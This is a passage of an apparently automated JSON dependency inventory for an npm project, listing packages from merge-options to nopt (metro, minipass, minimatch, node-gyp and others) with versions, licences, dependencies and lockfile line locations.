"hard-rejection@2.1.0", "minimist-options@4.1.0", "normalize-package-data@3.0.3", "read-pkg-up@7.0.1", "redent@3.0.0", "trim-newlines@3.0.1", "type-fest@0.18.1", "yargs-parser@20.2.9" ], "Locations": [ { "StartLine": 12316, "EndLine": 12341 } ], "AnalyzedBy": "npm" }, { "ID": "merge-options@3.0.4", "Name": "merge-options", "Identifier": { "PURL": "pkg:npm/merge-options@3.0.4", "UID": "7623e0ee3dc25e2e" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-plain-obj@2.1.0" ], "Locations": [ { "StartLine": 12363, "EndLine": 12374 } ], "AnalyzedBy": "npm" }, { "ID": "merge-stream@2.0.0", "Name": "merge-stream", "Identifier": { "PURL": "pkg:npm/merge-stream@2.0.0", "UID": "4f4303a6ab9a064f" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12375, "EndLine": 12380 } ], "AnalyzedBy": "npm" }, { "ID": "merge2@1.4.1", "Name": "merge2", "Identifier": { "PURL": "pkg:npm/merge2@1.4.1", "UID": "5d7cb21cf7c58e4" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12381, "EndLine": 12389 } ], "AnalyzedBy": "npm" }, { "ID": "metro@0.83.3", "Name": "metro", "Identifier": { "PURL": "pkg:npm/metro@0.83.3", "UID": "bbbb0009a784fdfd" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "@babel/types@7.28.4", "accepts@1.3.8", "chalk@4.1.2", "ci-info@2.0.0", "connect@3.7.0", "debug@4.4.3", "error-stack-parser@2.1.4", "flow-enums-runtime@0.0.6", "graceful-fs@4.2.11", "hermes-parser@0.32.0", "image-size@1.2.1", "invariant@2.2.4", "jest-worker@29.7.0", "jsc-safe-url@0.2.4", "lodash.throttle@4.1.1", "metro-babel-transformer@0.83.3", "metro-cache-key@0.83.3", "metro-cache@0.83.3", "metro-config@0.83.3", "metro-core@0.83.3", "metro-file-map@0.83.3", "metro-resolver@0.83.3", "metro-runtime@0.83.3", "metro-source-map@0.83.3", "metro-symbolicate@0.83.3", "metro-transform-plugins@0.83.3", "metro-transform-worker@0.83.3", "mime-types@2.1.35", "nullthrows@1.1.1", "serialize-error@2.1.0", "source-map@0.5.7", "throat@5.0.0", "ws@7.5.10", "yargs@17.7.2" ], "Locations": [ { "StartLine": 12390, "EndLine": 12443 } ], "AnalyzedBy": "npm" }, { "ID": "metro-babel-transformer@0.83.3", "Name": "metro-babel-transformer", "Identifier": { "PURL": "pkg:npm/metro-babel-transformer@0.83.3", "UID": "5a484d017b3a4004" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "flow-enums-runtime@0.0.6", "hermes-parser@0.32.0", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 12444, "EndLine": 12458 } ], "AnalyzedBy": "npm" }, { "ID": "metro-cache@0.83.3", "Name": "metro-cache", "Identifier": { "PURL": "pkg:npm/metro-cache@0.83.3", "UID": "fd2f34711da0383c" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "exponential-backoff@3.1.2", "flow-enums-runtime@0.0.6", "https-proxy-agent@7.0.6", "metro-core@0.83.3" ], "Locations": [ { "StartLine": 12474, "EndLine": 12488 } ], "AnalyzedBy": "npm" }, { "ID": "metro-cache-key@0.83.3", "Name": "metro-cache-key", "Identifier": { "PURL": "pkg:npm/metro-cache-key@0.83.3", "UID": "84eaee5ff4cac930" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 12489, "EndLine": 12500 } ], "AnalyzedBy": "npm" }, { "ID": "metro-config@0.83.3", "Name": "metro-config", "Identifier": { "PURL": "pkg:npm/metro-config@0.83.3", "UID": "c928b465fc35dbb6" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "connect@3.7.0", "flow-enums-runtime@0.0.6", "jest-validate@29.7.0", "metro-cache@0.83.3", "metro-core@0.83.3", "metro-runtime@0.83.3", "metro@0.83.3", "yaml@2.8.1" ], "Locations": [ { "StartLine": 12501, "EndLine": 12519 } ], "AnalyzedBy": "npm" }, { "ID": "metro-core@0.83.3", "Name": "metro-core", "Identifier": { "PURL": "pkg:npm/metro-core@0.83.3", "UID": "ffc6bd8a6b52d08d" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "lodash.throttle@4.1.1", "metro-resolver@0.83.3" ], "Locations": [ { "StartLine": 12520, "EndLine": 12533 } ], "AnalyzedBy": "npm" }, { "ID": "metro-file-map@0.83.3", "Name": "metro-file-map", "Identifier": { "PURL": "pkg:npm/metro-file-map@0.83.3", "UID": "ec5b5ae50427d814" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3", "fb-watchman@2.0.2", "flow-enums-runtime@0.0.6", "graceful-fs@4.2.11", "invariant@2.2.4", "jest-worker@29.7.0", "micromatch@4.0.8", "nullthrows@1.1.1", "walker@1.0.8" ], "Locations": [ { "StartLine": 12534, "EndLine": 12553 } ], "AnalyzedBy": "npm" }, { "ID": "metro-minify-terser@0.83.3", "Name": "metro-minify-terser", "Identifier": { "PURL": "pkg:npm/metro-minify-terser@0.83.3", "UID": "8e07a369d569f904" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "terser@5.44.0" ], "Locations": [ { "StartLine": 12554, "EndLine": 12566 } ], "AnalyzedBy": "npm" }, { "ID": "metro-resolver@0.83.3", "Name": "metro-resolver", "Identifier": { "PURL": "pkg:npm/metro-resolver@0.83.3", "UID": "8873a951c4d3469d" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 12567, "EndLine": 12578 } ], "AnalyzedBy": "npm" }, { "ID": "metro-runtime@0.83.3", "Name": "metro-runtime", "Identifier": { "PURL": "pkg:npm/metro-runtime@0.83.3", "UID": "6952bce8e1ae2e73" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.28.4", "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 12579, "EndLine": 12591 } ], "AnalyzedBy": "npm" }, { "ID": "metro-source-map@0.83.3", "Name": "metro-source-map", "Identifier": { "PURL": "pkg:npm/metro-source-map@0.83.3", "UID": "34ebb542669fb6c3" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse--for-generate-function-map@7.28.4", "@babel/traverse@7.28.4", "@babel/types@7.28.4", "flow-enums-runtime@0.0.6", "invariant@2.2.4", "metro-symbolicate@0.83.3", "nullthrows@1.1.1", "ob1@0.83.3", "source-map@0.5.7", "vlq@1.0.1" ], "Locations": [ { "StartLine": 12592, "EndLine": 12612 } ], "AnalyzedBy": "npm" }, { "ID": "metro-symbolicate@0.83.3", "Name": "metro-symbolicate", "Identifier": { "PURL": "pkg:npm/metro-symbolicate@0.83.3", "UID": "537d705f96133974" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6", "invariant@2.2.4", "metro-source-map@0.83.3", "nullthrows@1.1.1", "source-map@0.5.7", "vlq@1.0.1" ], "Locations": [ { "StartLine": 12622, "EndLine": 12641 } ], "AnalyzedBy": "npm" }, { "ID": "metro-transform-plugins@0.83.3", "Name": "metro-transform-plugins", "Identifier": { "PURL": "pkg:npm/metro-transform-plugins@0.83.3", "UID": "cadd877bd53991e" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "flow-enums-runtime@0.0.6", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 12651, "EndLine": 12667 } ], "AnalyzedBy": "npm" }, { "ID": "metro-transform-worker@0.83.3", "Name": "metro-transform-worker", "Identifier": { "PURL": "pkg:npm/metro-transform-worker@0.83.3", "UID": "d824036670560ea4" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/generator@7.28.3", "@babel/parser@7.28.4", "@babel/types@7.28.4", "flow-enums-runtime@0.0.6", "metro-babel-transformer@0.83.3", "metro-cache-key@0.83.3", "metro-cache@0.83.3", "metro-minify-terser@0.83.3", "metro-source-map@0.83.3", "metro-transform-plugins@0.83.3", "metro@0.83.3", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 12668, "EndLine": 12691 } ], "AnalyzedBy": "npm" }, { "ID": "micromatch@4.0.8", "Name": "micromatch", "Identifier": { "PURL": "pkg:npm/micromatch@4.0.8", "UID": "6622bdc92d82389e" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "braces@3.0.3", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 12743, "EndLine": 12755 } ], "AnalyzedBy": "npm" }, { "ID": "mime@1.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@1.6.0", "UID": "21c80f3a47af737b" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19339, "EndLine": 19350 } ], "AnalyzedBy": "npm" }, { "ID": "mime@2.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@2.6.0", "UID": "ce887b09a89757a6" }, "Version": "2.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4295, "EndLine": 4307 }, { "StartLine": 17632, "EndLine": 17643 } ], "AnalyzedBy": "npm" }, { "ID": "mime-db@1.52.0", "Name": "mime-db", "Identifier": { "PURL": "pkg:npm/mime-db@1.52.0", "UID": "87aa76a86f450a37" }, "Version": "1.52.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12771, "EndLine": 12779 } ], "AnalyzedBy": "npm" }, { "ID": "mime-types@2.1.35", "Name": "mime-types", "Identifier": { "PURL": "pkg:npm/mime-types@2.1.35", "UID": "16e8978b7540dd15" }, "Version": "2.1.35", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-db@1.52.0" ], "Locations": [ { "StartLine": 12780, "EndLine": 12791 } ], "AnalyzedBy": "npm" }, { "ID": "mimic-fn@2.1.0", "Name": "mimic-fn", "Identifier": { "PURL": "pkg:npm/mimic-fn@2.1.0", "UID": "7e1b54d7c7dc30f1" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12792, "EndLine": 12800 } ], "AnalyzedBy": "npm" }, { "ID": "mimic-response@3.1.0", "Name": "mimic-response", "Identifier": { "PURL": "pkg:npm/mimic-response@3.1.0", "UID": "24e60a20b3bf47f3" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12801, "EndLine": 12812 } ], "AnalyzedBy": "npm" }, { "ID": "min-indent@1.0.1", "Name": "min-indent", "Identifier": { "PURL": "pkg:npm/min-indent@1.0.1", "UID": "d20c1ecabff975d5" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12813, "EndLine": 12821 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@10.0.3", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "97121a07d790c0d3" }, "Version": "10.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/brace-expansion@5.0.0" ], "Locations": [ { "StartLine": 14795, "EndLine": 14808 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@3.1.2", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "69ef7485f56c11bb" }, "Version": "3.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@1.1.12" ], "Locations": [ { "StartLine": 2284, "EndLine": 2296 }, { "StartLine": 3276, "EndLine": 3288 }, { "StartLine": 8768, "EndLine": 8780 }, { "StartLine": 8874, "EndLine": 8886 }, { "StartLine": 9778, "EndLine": 9789 }, { "StartLine": 20579, "EndLine": 20590 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@8.0.7", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@8.0.7", "UID": "9d8dd66d3de32b0d" }, "Version": "8.0.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.0.2" ], "Locations": [ { "StartLine": 6354, "EndLine": 6368 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@9.0.5", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "f9b14aafc2d2d91a" }, "Version": "9.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.0.2" ], "Locations": [ { "StartLine": 12822, "EndLine": 12836 }, { "StartLine": 13976, "EndLine": 13989 }, { "StartLine": 15081, "EndLine": 15096 } ], "AnalyzedBy": "npm" }, { "ID": "minimist@1.2.8", "Name": "minimist", "Identifier": { "PURL": "pkg:npm/minimist@1.2.8", "UID": "a585ee83cef51d6c" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12837, "EndLine": 12845 } ], "AnalyzedBy": "npm" }, { "ID": "minimist-options@4.1.0", "Name": "minimist-options", "Identifier": { "PURL": "pkg:npm/minimist-options@4.1.0", "UID": "566ac4f2cc818832" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "arrify@1.0.1", "is-plain-obj@1.1.0", "kind-of@6.0.3" ], "Locations": [ { "StartLine": 12846, "EndLine": 12859 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@3.3.6", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@3.3.6", "UID": "e355d7b9883afbe9" }, "Version": "3.3.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 6865, "EndLine": 6877 }, { "StartLine": 9515, "EndLine": 9527 }, { "StartLine": 12201, "EndLine": 12213 }, { "StartLine": 12891, "EndLine": 12903 }, { "StartLine": 12929, "EndLine": 12941 }, { "StartLine": 12962, "EndLine": 12974 }, { "StartLine": 12995, "EndLine": 13007 }, { "StartLine": 13028, "EndLine": 13040 }, { "StartLine": 13062, "EndLine": 13074 }, { "StartLine": 14861, "EndLine": 14871 }, { "StartLine": 14885, "EndLine": 14895 }, { "StartLine": 14909, "EndLine": 14919 }, { "StartLine": 19947, "EndLine": 19959 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@4.2.8", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@4.2.8", "UID": "3cc8bcc2b9772ab4" }, "Version": "4.2.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6369, "EndLine": 6377 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@5.0.0", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@5.0.0", "UID": "fe5d2ee9f26f90a0" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20504, "EndLine": 20513 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@7.1.2", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@7.1.2", "UID": "f5102f4a76b9db01" }, "Version": "7.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12869, "EndLine": 12877 }, { "StartLine": 14809, "EndLine": 14818 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-collect@1.0.2", "Name": "minipass-collect", "Identifier": { "PURL": "pkg:npm/minipass-collect@1.0.2", "UID": "e3c359f0ffd3a652" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 12878, "EndLine": 12890 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-collect@2.0.1", "Name": "minipass-collect", "Identifier": { "PURL": "pkg:npm/minipass-collect@2.0.1", "UID": "f9167ee3c7178c4c" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 14819, "EndLine": 14831 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-fetch@1.4.1", "Name": "minipass-fetch", "Identifier": { "PURL": "pkg:npm/minipass-fetch@1.4.1", "UID": "2f36da76cb43bdc2" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encoding@0.1.13", "minipass-sized@1.0.3", "minipass@3.3.6", "minizlib@2.1.2" ], "Locations": [ { "StartLine": 12911, "EndLine": 12928 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-fetch@4.0.1", "Name": "minipass-fetch", "Identifier": { "PURL": "pkg:npm/minipass-fetch@4.0.1", "UID": "5dad645d74ce242d" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encoding@0.1.13", "minipass-sized@1.0.3", "minipass@7.1.2", "minizlib@3.1.0" ], "Locations": [ { "StartLine": 14832, "EndLine": 14847 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-flush@1.0.5", "Name": "minipass-flush", "Identifier": { "PURL": "pkg:npm/minipass-flush@1.0.5", "UID": "856ad1efd93041b7" }, "Version": "1.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 12949, "EndLine": 12961 }, { "StartLine": 14848, "EndLine": 14860 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-pipeline@1.2.4", "Name": "minipass-pipeline", "Identifier": { "PURL": "pkg:npm/minipass-pipeline@1.2.4", "UID": "b42640ad8990f54e" }, "Version": "1.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 12982, "EndLine": 12994 }, { "StartLine": 14872, "EndLine": 14884 } ], "AnalyzedBy": "npm" }, { "ID": "minipass-sized@1.0.3", "Name": "minipass-sized", "Identifier": { "PURL": "pkg:npm/minipass-sized@1.0.3", "UID": "828e761e38c4617e" }, "Version": "1.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 13015, "EndLine": 13027 }, { "StartLine": 14896, "EndLine": 14908 } ], "AnalyzedBy": "npm" }, { "ID": "minizlib@2.1.2", "Name": "minizlib", "Identifier": { "PURL": "pkg:npm/minizlib@2.1.2", "UID": "c8daee8e5f746f3a" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6", "yallist@4.0.0" ], "Locations": [ { "StartLine": 13048, "EndLine": 13061 } ], "AnalyzedBy": "npm" }, { "ID": "minizlib@3.1.0", "Name": "minizlib", "Identifier": { "PURL": "pkg:npm/minizlib@3.1.0", "UID": "ee4ead8dcae1b54f" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 14920, "EndLine": 14932 } ], "AnalyzedBy": "npm" }, { "ID": "mkdirp@1.0.4", "Name": "mkdirp", "Identifier": { "PURL": "pkg:npm/mkdirp@1.0.4", "UID": "fa6dba5b63fadd12" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13082, "EndLine": 13093 } ], "AnalyzedBy": "npm" }, { "ID": "mkdirp-classic@0.5.3", "Name": "mkdirp-classic", "Identifier": { "PURL": "pkg:npm/mkdirp-classic@0.5.3", "UID": "64ba96e9a95564" }, "Version": "0.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13094, "EndLine": 13099 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.0.0", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.0.0", "UID": "90d54608e3fa22a5" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6675, "EndLine": 6681 }, { "StartLine": 7353, "EndLine": 7359 }, { "StartLine": 7390, "EndLine": 7395 }, { "StartLine": 9276, "EndLine": 9281 }, { "StartLine": 11825, "EndLine": 11830 }, { "StartLine": 19333, "EndLine": 19338 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.1.3", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.1.3", "UID": "ac6875497060eb93" }, "Version": "2.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13109, "EndLine": 13114 }, { "StartLine": 14933, "EndLine": 14939 } ], "AnalyzedBy": "npm" }, { "ID": "mute-stream@2.0.0", "Name": "mute-stream", "Identifier": { "PURL": "pkg:npm/mute-stream@2.0.0", "UID": "5f5f530995b8962f" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14940, "EndLine": 14947 } ], "AnalyzedBy": "npm" }, { "ID": "nanoid@3.3.11", "Name": "nanoid", "Identifier": { "PURL": "pkg:npm/nanoid@3.3.11", "UID": "4b2510c113abb607" }, "Version": "3.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13115, "EndLine": 13132 } ], "AnalyzedBy": "npm" }, { "ID": "napi-build-utils@2.0.0", "Name": "napi-build-utils", "Identifier": { "PURL": "pkg:npm/napi-build-utils@2.0.0", "UID": "db462abbe6ab4109" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13133, "EndLine": 13138 } ], "AnalyzedBy": "npm" }, { "ID": "negotiator@0.6.3", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@0.6.3", "UID": "e84defc9f744381f" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5780, "EndLine": 5788 } ], "AnalyzedBy": "npm" }, { "ID": "negotiator@0.6.4", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@0.6.4", "UID": "5dcfc5f12a08a060" }, "Version": "0.6.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13146, "EndLine": 13155 } ], "AnalyzedBy": "npm" }, { "ID": "negotiator@1.0.0", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@1.0.0", "UID": "d5a88c1ebf2640d1" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14948, "EndLine": 14957 } ], "AnalyzedBy": "npm" }, { "ID": "no-case@3.0.4", "Name": "no-case", "Identifier": { "PURL": "pkg:npm/no-case@3.0.4", "UID": "b4a4694ddce8d202" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lower-case@2.0.2", "tslib@2.8.1" ], "Locations": [ { "StartLine": 13156, "EndLine": 13165 } ], "AnalyzedBy": "npm" }, { "ID": "nocache@3.0.4", "Name": "nocache", "Identifier": { "PURL": "pkg:npm/nocache@3.0.4", "UID": "8eee10b454685bb7" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13172, "EndLine": 13181 } ], "AnalyzedBy": "npm" }, { "ID": "node-abi@3.78.0", "Name": "node-abi", "Identifier": { "PURL": "pkg:npm/node-abi@3.78.0", "UID": "4fcd3072ea85ee69" }, "Version": "3.78.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 13182, "EndLine": 13193 } ], "AnalyzedBy": "npm" }, { "ID": "node-addon-api@6.1.0", "Name": "node-addon-api", "Identifier": { "PURL": "pkg:npm/node-addon-api@6.1.0", "UID": "b310ea42f7e25b7a" }, "Version": "6.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13206, "EndLine": 13211 } ], "AnalyzedBy": "npm" }, { "ID": "node-addon-api@7.1.1", "Name": "node-addon-api", "Identifier": { "PURL": "pkg:npm/node-addon-api@7.1.1", "UID": "711bdfb587e52ab1" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19927, "EndLine": 19933 } ], "AnalyzedBy": "npm" }, { "ID": "node-fetch@1.7.3", "Name": "node-fetch", "Identifier": { "PURL": "pkg:npm/node-fetch@1.7.3", "UID": "e78eaaf2132ae187" }, "Version": "1.7.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encoding@0.1.13", "is-stream@1.1.0" ], "Locations": [ { "StartLine": 13212, "EndLine": 13221 } ], "AnalyzedBy": "npm" }, { "ID": "node-gyp@11.4.2", "Name": "node-gyp", "Identifier": { "PURL": "pkg:npm/node-gyp@11.4.2", "UID": "20b5782af8b44e1b" }, "Version": "11.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "env-paths@2.2.1", "exponential-backoff@3.1.2", "graceful-fs@4.2.11", "make-fetch-happen@14.0.3", "nopt@8.1.0", "proc-log@5.0.0", "semver@7.7.3", "tar@7.5.1", "tinyglobby@0.2.15", "which@5.0.0" ], "Locations": [ { "StartLine": 14958, "EndLine": 14980 } ], "AnalyzedBy": "npm" }, { "ID": "node-gyp@8.4.1", "Name": "node-gyp", "Identifier": { "PURL": "pkg:npm/node-gyp@8.4.1", "UID": "bd908fc6c4a06452" }, "Version": "8.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "env-paths@2.2.1", "glob@7.2.3", "graceful-fs@4.2.11", "make-fetch-happen@9.1.0", "nopt@5.0.0", "npmlog@6.0.2", "rimraf@3.0.2", "semver@7.7.3", "tar@6.2.1", "which@2.0.2" ], "Locations": [ { "StartLine": 13231, "EndLine": 13255 } ], "AnalyzedBy": "npm" }, { "ID": "node-html-parser@7.0.1", "Name": "node-html-parser", "Identifier": { "PURL": "pkg:npm/node-html-parser@7.0.1", "UID": "bfd1466b672cc535" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-select@5.2.2", "he@1.2.0" ], "Locations": [ { "StartLine": 13269, "EndLine": 13278 } ], "AnalyzedBy": "npm" }, { "ID": "node-int64@0.4.0", "Name": "node-int64", "Identifier": { "PURL": "pkg:npm/node-int64@0.4.0", "UID": "fea43e86bc06228f" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13279, "EndLine": 13284 } ], "AnalyzedBy": "npm" }, { "ID": "node-releases@2.0.23", "Name": "node-releases", "Identifier": { "PURL": "pkg:npm/node-releases@2.0.23", "UID": "f9b959f2943c8284" }, "Version": "2.0.23", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13285, "EndLine": 13290 } ], "AnalyzedBy": "npm" }, { "ID": "node-stream-zip@1.15.0", "Name": "node-stream-zip", "Identifier": { "PURL": "pkg:npm/node-stream-zip@1.15.0", "UID": "76dc55a507845b7d" }, "Version": "1.15.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13291, "EndLine": 13304 } ], "AnalyzedBy": "npm" }, { "ID": "noop-fn@1.0.0", "Name": "noop-fn", "Identifier": { "PURL": "pkg:npm/noop-fn@1.0.0", "UID": "99f4bd480b5d08a5" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13305, "EndLine": 13310 } ], "AnalyzedBy": "npm" }, { "ID": "nopt@5.0.0", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@5.0.0", "UID": "43548e31e6725e42" }, "Version": 